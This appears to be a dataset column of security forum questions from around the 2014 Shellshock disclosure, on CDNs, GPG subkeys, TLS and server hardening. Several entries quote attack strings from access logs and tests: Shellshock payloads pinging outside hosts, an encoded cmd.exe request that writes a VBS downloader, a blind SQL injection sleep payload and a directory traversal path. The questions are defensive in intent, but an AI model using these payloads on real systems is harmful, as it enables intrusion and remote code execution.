instruction
stringlengths
24
29.9k
Today I read about an alleged malware attack targeting jQuery.com A german blogger who is what I would call an expert on IT security stated that Any website that is working with individual-related data should not reference external libraries Yet, usage of CDN's is recommended by large companies like Google as well as...
Virtualised environments are focused on isolating the guest OS. Using the VirtualBox model, the guest might be behind a virtual NAT and/or talk only with other VMs via internal networks, and only with the host via host-only networks. All these methods are meant to make the host invisible and unreachable from the out...
This article in GoDaddy support knowledge base says All of our SSL certificates support high-grade 256-bit encryption How would they not support it? The SSL certificate contains keys for asymmetric encryption and is there to prove that the server is exactly what it claims and allow the server and the client choose t...
In a web application, accessed by browser via https, users need to be able to access data stored on a server in a MySQL database. Data has to be encrypted for several groups of users, where one group can only decrypt their own data. Members of such a group would be one group admin, able to see all of the groups data, a...
What is the difference between 1st party cookies and 3rd party cookies and what are the pros and cons of disabling it? Will facebook and google (and other ad companies) be completely unable to track you when they're not in their site? What about if you are on a site that requires a facebook or gmail login? Will these s...
We are trying to come up with a scheme to secure http communication between our internal servers. Are there any good established schemes out there? The requirements we have are: The clients and servers are physically located in different places and need to communicate over the internet. The client needs guarantees tha...
I've heard that SHA-1 hashing is becoming less secure, and that most GPG keys are secured with SHA-1. Is there a way to determined if SHA-1 is in my GPG key, and what to do if this is the case?
When I initially set up PGP, PGPTools didn't prompt me to create separate subkeys, as explained in the article "Creating the Perfect PGP Keypair". Now that I've learned a bit more about PGP, I'd like to transition to using subkeys properly. But I don't want all of my emails which I signed previously to no longer be val...
Can an attacker listen GSM calls in clear audio form (real time) using RTL-SDR dongle if he/she has powerful-enough hardware to crack the A5/1 crypto scheme in countries where no more secure cryptography is used by mobile operators for encrypting the conversations? How easy this can be done?
Take a random PHP site. It is essentially guaranteed that its web server is configured as follows: serve any file from the document root, except for certain files or paths that are blacklisted. Scripts are also made executable using a similar model: all .php files are executable by the web server except the blacklisted...
So I understand the principles behind the concept of a revocation certificate and why it should be useful to create one and back up before harm occurs. The thing is, I don't see a wide range of media (or any at all) on which it makes sense to do this in practical life. Here's what I'm taking into consideration: Having ...
I read some articles (article1, article2, article3, article4) about the Shellshock Bash bug (CVE-2014-6271 reported Sep 24, 2014) and have a general idea of what the vulnerability is and how it could be exploited. To better understand the implications of the bug, what would be a simple and specific example of an attack...
I've recently heard via Twitter about CVE-2014-6271. Are ordinary OS X desktops, that aren't acting as a web server, at risks of receiving attacks that could exploit this vulnerability?
Does the bug in Bash affect Android or iOS mobile systems?
Odds are that you're already aware of the newly discovered Bash bug. It can be tested using env x='() { :;}; echo vulnerable' bash -c "echo this is a test". What yet I haven't understand is, what are the real attack scenarios of this vulnerability. I have read that most likely it's going to be HTTP requests, but how?
These days there are several database technologies are available for data storage purpose. While performing injection attacks, how do attackers actually identify the database used by a website? If it is possible by any queries or commands through any application entry points, can someone explain to me the instructio...
I have an Apache webserver running, and with the recent news of the Shellsock exploit against bash I was wondering if my webserver is vulnerable. I don't think it is, but I want to make sure I'm not mistaken. I don't use any bash CGI intentionally on the server, it is running some PHP stuff using mod_php and a Python W...
I am new to C++. Can any C++ expert tell me would this causing buffer overflow? Sample Code: MyObject op; memset(&op, 0, sizeof(MyObject)); On my view it is ok to be this since the limit is the size of the object type itself but there is a security tools caught this as a buffer overflow. If it is really a buffer overf...
Source: http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html For the same reason, userland DHCP clients that invoke configuration scripts and use variables to pass down config details are at risk when exposed to rogue servers (e.g., on open wifi). Wonder if Linux dhclient is vulnerable to co...
I am using 2 forms of remote access to my Windows Server 2008 machine, both go to the Admin account since we only use it to host a Minecraft (MC) Server. Remote Desktop, that goes over a custom port instead of standard, which has a scope to only allow connections from certain IP addresses, and of course the hardware fi...
I have read somewhere that in SQL injection attacks the attackers use such keywords into application entry points. Whats the purpose of doing this?
I did apt-get update; apt-get upgrade -y on all systems I'm running. I'm not sure if my /etc/apt/sources.list is good enough on all of these systems. I would like to quickly check each system again, ideally with a one-line shell command. Does such a one-line shell command exist and if so, what is it? Note this question...
I was researching on Injection issues in MS SQL Server. I came to read about xp_cmdshell. I think this must be enabled in the SQL server for attackers to perform many exploits. Actually what is this function doing and why attackers always keep an eye on this?
Consider this scenario: Alice is a typical corporate shark. She wants to get ahead in her organisation. Alice has a sensitive information security scenario, she needs expert consultation but she doesn't know any experts. Due to whatever she's consulting on, she needs to be completely untraceable. Same goes for the con...
Question: How do I know that I am affected or not by the bash CVE-2014-6271? I just have to simply run a command on the server? $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" vulnerable this is a test $ Not using it via SSH and example using ksh (but bash is installed). UPDATE: if bash isn't the ...
The three options listed in the CERT release (AcceptEnv TERM and SSH_ORIGINAL_COMMAND) are all server-side options. If none of these are set on a host (and no http vector is available) is the host secure, even if Bash remains unfixed? If I set AcceptEnv=HACK on the openssh server, shouldn't this work? HACK='() { :;}; /...
According to a number of articles, e.g. "Creating the Perfect GPG Keypair," it is advisable to have a number of subkeys in your GPG key, one for encryption, and one for signing, and then to (a) back up your keys as well as a revocation certificate [ideally on paper too] and (b) remove the "primary" signing secret key f...
I'm having a hard time finding the practical benefits of transmitting a self-signed certificate over simply a public key. I understand that a self-signed certificate proves the integrity of the public key and user ID (i.e. proof the signer is able to decrypt messages encrypted by the public key), but what is the practi...
I am into bitcoin right now, and the password threats scare me a little... Not so much for me, because I use LastPass and generate new passwords at 20 characters and it includes symbols, upper and lower case letters as well as numbers. However, I know that we are nearing a time where 100 billion passwords a second can...
Okay, so I don't have much HTML experience, but I recently started working on a project with a group of people that involves regularly manipulating files in a web server. I would like to work on this project when I am at work sometimes, but use of remote connection is discouraged there. I thought I could write a progr...
As Cisco uses bash (and web interfaces if you haven't disable it) is it susceptible to the shell shock vulnerability?
I'm trying to determine if Sagan can do anything similar to fail2ban where detected attacks can be temporarily blacklisted, via a system's firewall (iptables). Does Sagan have any "countermeasures" or "active response" capabilities?
I read What's keeping a malicious man in the middle server from forging a valid certificate?, but when the client goes to verify the certificate, can't an attacker intercept that connection and say that the certificate is a valid certificate? Therefore, an attacker can send a forged certificate that the client could no...
My Mac is vulnerable, as this test shows: x='() { :;}; echo VULNERABLE' bash -c : (source) I am using the version of bash that came with it. I also use Homebrew. What is the preferred way to patch Bash?
I came along this blind SQL injection time based payload and I need to understand how it works (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
After the news of the Shellshock vulnerability broke out, I remembered I had GitHub's version of a bash shell for Windows installed. Just to see if it also had the vulnerability, I executed: env x='() { :;}; echo vulnerable' bash -c "echo this is a test" And got back: vulnerable this is a test Still, being a Windows ...
I was looking over the new Bash exploit and was looking at this post in particular. Attack scenarios of the new Bash vulnerability What I don't understand is how does including bash in the user-agent string cause it to be executed. It seems odd to me that the user agent would ever be executed on the server. I know this...
I am trying to understand meaning of the Subject Alternative Name extension. The reason of usage it in SSL X.509 certificates or other end-entities certificates is mostly clear for me. However, I didn't find any information whether it is feasible or not to use this extension in CAs certificates (self-signed or not). Is...
Seems to me that there is a need to remain online, esp. for business users and that even when this is corrected, there will be a need to go back online to get the Apple patch. e.g. Is removing bash a viable workaround to remain secure for the moment.
Does the recent shellshock vulnerability in bash affect stock Django? Assume any of the production setups listed on the Django site are used (gunicorn, wsgi, nginx). If not, are there any commonly used Django extensions that could be vulnerable? Obviously, bash should be updated regardless, but most coverage of actual...
We have tons of vmware hosted servers in our DMZ environment, with the recent shellshock bash bug, what do I need to do to protect our environment?
I am checking my systems with the following command: env X="() { :;} ; echo busted" /bin/sh -c "echo completed" Which gives me: "completed", with no "busted", which seems good. So I tried again with: env x='() { :;}; echo vulnerable' bash -c "echo this is a test" Which results in: bash: warning: testbug: ignoring fun...
I have patched my system however CVE-2014-7169 claims that the fix for 6271 was incomplete. Sure enough if I run the command below: env X='() { (a)=>\' sh -c "echo date"; cat echo It appears that function parsing is still executing code as I do not get an error like I am supposed to. So if 6271 allowed an attacker to ...
At the risk of adding to the heap of "Shellshock"-related questions... The Shellshock patch prevents arbitrary code from being executed after function definitions in environment variables. For example, here is what a patched version of Bash does when one tries to exploit the hole: $ env foo='() { :;}; echo derp' bash -...
im wondering if palo alto firewalls have released perimeter protection for the bash shell vulnerability.
I have an internal website (going on the intranet) that is going to go through vigorous testing to make sure that it is secure, so I am battening down the hatches so to speak and I coded a .NET repeater to Bind to a .NET SqlDatasource in the aspx page, not in the code behind. I use the SelectParameters tags to insert t...
I just tested whether or not my university's environment was vulnerable to the shellshock bug using env X="() { :;} ; echo busted" /bin/sh -c "echo stuff" (code from http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html) The output was stuff, as such the environment isn't vulnerable to the shellshoc...
According to Red Hat httpd (attack vector): CGI scripts are likely affected by this issue: when a CGI script is run by the web server, it uses environment variables to pass data to the script. These environment variables can be controlled by the attacker. If the CGI script calls Bash, the script could execute ...
From what I observed using standard encryption tools such as OpenSSH and GPG, the decryption only succeeds when the correct password/key is provided (or at most a few others, in case of collision). (I also verified this by decryptin a single-letter message and trying to decrypt with millions of random passwords.) Howev...
I am worried about the millions (actually, worried about mine) of routers/modems that run Linux. How exposed are they to Shellshock?
I am wondering whether my server could be vulnerable to ShellShock (or better: was vulnerable). The shell test reveals that I'm vulnerable: $ export evil='() { :;}; echo vulnerable'; bash -c echo; vulnerable I don't need CGI for any of my websites, but just to be sure, I tried grep -i "cgi" * on my Apache config files...
Can my Mac be affected by malware without running it? For instance, if I download a random file, but don't open it, can it infect my computer?
I am designing a web site that contains external suppliers to register and keep their information with the company up to date. We already have a db with EIN, SSN numbers and their addresses. One of the enhancements users wanted is to display a list of addresses when a known ein/ssn is entered during registration. This ...
On the gitolite documentation page it says the following: "Before running the command, however, sshd sets up an environment variable called SSH_ORIGINAL_COMMAND which contains the actual git command that your workstation sent out. This is the command that would have run if you did not have the command= part in the auth...
I've been researching this for a bit now and cannot find what I want. So I'm to the point where I'm weighing my options as to how I can proceed. Background I'd like to setup a HIDS that has the ability to use rules to monitor web server logs for known patterns of attacks. I'm thinking something along the lines of how ...
So I have a web directory running on a server and I want only people with the password to be able to get in. Is it possible to secure the web root with .htaccess? Is there any extra steps I need to take? I currently have tried setting it up as follows: In a folder outside the web directory, I have /.../.../.htpasswd ....
If a wireless card can send packets, why can't it inject packets? All have to do to inject a packet is create a raw socket, construct a packet with the spoofed headers and then send the packet through the raw socket. This would require root/admin on most operating systems, but it would still be possible. Some people gi...
I found this request in my Ubuntu 14.04 apache2 access.log: xxx.228.207.244 - - [25/Sep/2014:17:52:03 -0400] "GET /?search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3ASet+WshShell+%3D+Wscript.CreateObject%28%22WScript.Shell%22%29+%3ADS%3DArray%2...
Anyone know which opensource network IDSs are using anomaly techniques? My project is to compare them, so if you could give me some hints, that would be much appreciated. Currently, I am looking at Snort with SPADE and Snort.AD pre-processor. Bro also claims to be able to detect novel attacks (anomaly detection functio...
The Derby Database supports encryption with a key or password. Traditionally this key is stored in the file systems, now I am looking to store and protect this key in the HSM instead, but I couldn't figure out how I should be doing it. The most simplest approach seems to be just putting the key itself into the HSM? Th...
I can't understand something about Shellshock bug - if these environmental functions (which declaration begins with "()" ) are executed on the shell start, how does the patch prevent the problem? We can still set some function through HTTP headers, and the next time when on the server someone opens Terminal for exampl...
In the passface authentication system, whether the passfaces are selected by the users or assigned by the system? Is such system secure? How is user's passface stored on the server side?
I tried to Google this but information is very scant ATM. Is there anyone compiling a list with a specific focus on SOHO routers?
I'm reading RFC4279 (Pre-Shared Key Ciphersuites for Transport Layer Security), Section 7.1, which is about Perfect Forward Secrecy. In that section, it's said that PSK/RSA_PSK ciphersuites don't provide forward secrecy. But, if I'm not wrong, PSKs are used to form premaster secret, which is then used with random numb...
I want to know if my servers are still vulnerable under the following conditions... My servers are private - only myself and trusted developers have access to them We have enabled executables within PHP/Node/Python - but we never use post/get data. We have some public webpages. Edit - to clarify - PHP and Python do no...
I grepped my Apache's access.log today for the now infamous () { string, and besides a bunch of what seemed like pings to check how many servers are vulnerable, I found this attempt, which looked like a genuine attack: 94.23.193.131 - - [26/Sep/2014:05:48:53 +0200] "GET / HTTP/1.0" 200 29271 "-" "() { :;}; /bin/bash -c...
I've got several VPS boxes (Digital Ocean boxes w/Ubuntu) that I would like to lock down from the outside world. I want to have several private boxes (web servers, db servers, puppet/master boxes etc.) along with a public facing load balancer box that will forward requests to the private web boxes. I am trying to figur...
I am a newbie to data security and would like to ask few questions related to Google Mail and Google Drive. What I want to know is how these two apps could be used to access a company's network AND how its data on Google Drive can be taken advantage of. So here are my questions numbered: Could Google Mail and Google D...
I want to test a web application for Directory Traversal (DT) vulnerability. I have gone through a lot of google pages but can't find a clear description. I've tried using ../.././../../etc/passwd along with the URLS however not sure where I'm heading. Please help me find any links where I can read and go ahead testi...
In symmetric key settings, in order to provide the message integrity, we compute the hash of the message. The message along with the message digest is then encrypted. Is it necessary to encrypt the hash of the message? Can't we send the encrypted message along with the unencrypted message digest?
I was just reading about Shellshock and how it works. From what I understood it exploits the fact that the code is being executed even after the export of the function definition which is exported as an env variable. Why isn't the fact that you can set environmental variables on a server a big security issue of its own...
egrep "};|}\s*;" /var/www/logs/access* 89.207.135.125 - - [25/Sep/2014:10:47:58 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" How can we shut down the server behind the IP that did this?
I've got a login page with a form where they can input their account's email address and password. I'm doing the following things before even attempting to authenticate a user: Validating the email address for correct format. Validating the password for not being empty. If any of these are invalid, I report back with...
I recently started to read up on OAuth2, and just now noticed how many extensions exist to this protocol. Is there an overview or some kind of a map of OAuth2 and all of its (official) extensions? I was hoping that something like in the diagram below somewhere existed. If no such document exists, then I would like to...
Currently I know of three serious attack vectors: crafted cgi parameters from a web client dhclient getting crafted hostnames from a DHCP server restricted SSH users getting full shell access I realise this may be too wide of a question, but I did not find any such info as of yet, only vague guesses. (Maybe this ques...
I've seen attack scenarios involving using wget on cgi-scripts, but how about a scenario exploiting a web server php script that issues an exec() or system() call to a bash script? As far as I can tell, environment variables like HTTP_USER_AGENT don't get passed to exec'ed shell scripts, at least by default.
I have some Linux servers, which from what I can tell are not vulnerable to the shellshock attack vector, but I am curious what the attack looks like in the logs. What does a successful attack look like in the appache2 logs? What would a successful attack look like in the system log? What do failed attempts look like? ...
I want to make my Synology NAS accessible over the internet. When I create my own certificate and import this on all my devices (PC, Laptop, Smartphone, Tablet, etc.) is this as secure as buying a certificate? If not, what is the most secure thing I can achieve without spending any extra money?
I have installed Git for Windows with bash shell support. Is it vulnerable to ShellShock? Refs: GitHub's Bash Shell for Windows is vulnerable to Shellshock. Can it do any harm though? https://stackoverflow.com/questions/16757393/what-is-the-difference-between-git-bash-and-the-github-for-windows-shell
My enterprise environment is "protected" with reverse proxies, how safe am I?
Should a user be able to unlock his own account after being locked out? Typically there are requirements that specify that users are to be automatically locked out: The user's account should be locked after too many failed password attempts The user's account should be locked out after 90 days of inactivity. The ques...
What are the differences between WPA2-PSK and WPA2 EAP-PSK? What are the pros and cons of using one configuration or the other?
Just wondering to make sure I completely clean up my device.
I am building a restful web services. My requirement is that I have to provide authentication for accessing the webservices. First I tried with basic authentication. Which is working fine, but somewhere I read Digest authentication is more secure so I implemented it. After some days we started implementing keyed-HMAC ...
This may be a stupid question. My router was unsecured for a while. We think the neighbors set up their own network using our router, creating a new network name, new wifi and router password. We have since secured (WPA2) our network, changed the network name, changed the password for the router and the wifi. H...
At the moment I am looking for some way on Linux to have packet filter whitelisting done but based on fine-grained parameters such as packet content rather than more general parameters such as protocol type or IP source. A security critical application running on the firewalled host must not be able to see or parse the...
What are the major differences between using OpenVPN and using VPN over OpenSSH? Does adding a virtual tunnel interface to a SSH connection offer the same benefits of OpenVPN? Can PuTTY be used on Windows to use the "layer-3 IP-in-SSH tunnelling" protocol described in the article? The article states there are no Window...
This is intended to be a Community Wiki to document which operating systems and devices are known to be affected by the Shellshock vulnerability (and related vulnerabilities), and what patches are available. The CW list should contain the following pieces of information: Name of product affected. (Include affected ve...
Please forgive my terminology mishaps. Recently, I tried to connect to a server over SFTP. The SSH public key response differed by 1 byte to what I was expecting, from an info page. I was tempted to go ahead and connect anyway, assuming it must be a typo. But I didn't, instead contacted the sysadmin. It turns out it wa...
I've always thought about how the symmetric cyphers are verified. Let say I would invent a new cypher. (actually I don't :-)) How should I rationalize its security to the public? As far as I saw papers about cyphers and their security I've never seen any real mathematical proof about it's security. I just saw a kind of...
I am not sure if this is right place to ask this question. I have created an xls file to store all my password in it. lately I have uploaded same file on Google Drive to access it from remote computer as well. My questions are: Is it safe enough to store passwords in XLS file with password on it? Is it safe to uploa...
Tails and Whonix both can run in VirtualBox. Tails doesn't recommends it for security reasons (https://tails.boum.org/doc/advanced_topics/virtualization/index.en.html), for Whonix it seems to be a standard mode of operation. What are the design differences which makes Whonix more secure to use it together with Virtual...
Someone, today, appears to have tried to attack my VPS. I checked my logs and saw this: 54.251.83.67 - - [26/Sep/2014:17:07:02 -0400] "GET / HTTP/1.1" 200 1437 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a" Am I vulnerable? If not, how could I tell if I was? I updated to the latest update earlier b...
Is there any restriction or policy of large e-mail providers (such as GMail, Yahoo, Hotmail and similar) for keeping/storing large encrypted files by the users within their disk quota in 3rd party mailbox for privacy purposes?
Is my understanding correct that in order to exploit via "Shell Shock", binary we influence needs to execute bash (and we need to have influence on command line)? Therefore, am I correct, that if binary does not execute bash directly, and does not use system() system call (which uses shell for command evaluation), but,...
lately I've been using the guest session on my xubuntu install because I am lazy and I was wondering what the security implications can be on the rest of the system if there is a web browser exploit or similar attack. Apparently it wipes the entire guest session every time you log out or it goes idle. Would a better al...
I see that CA's are now giving the option of having the root CA cert signed with SHA2. I have been told that the hashing function in a root has no security value, and is irrelevant as far as a collision vulnerability because the cert lives in the trust store of the host system, so it requires no verification, and fakin...
I found what looks like a possible attempted Shellshock attack targeting tmUnblock.cgi, and I'm trying to understand it. I was checking through Apache access logs for a small webserver during the time period between the Shellshock bug becoming news and the server being patched, looking for suspicous entries. It gets ...
My server is obviously up to date and not vulnerable to shellshock exploits. However I am still curious to know how the following shellshock scan work: /var/log/apache2 # cat access.log | grep bash 209.126.230.72 - - [25/Sep/2014:00:52:03 +0000] "GET / HTTP/1.0" 200 11783 "() { :; }; ping -c 11 209.126.230.74" "shellsh...
My server is obviously up to date and not vulnerable to shellshock exploits. However, I am still curious and would like to understand how to decode the following malicious vulnerability scan. I have a long series of these in my logs, testing various cgi script names: root@ks304960 01:41:29 /var/log/apache2 # cat access...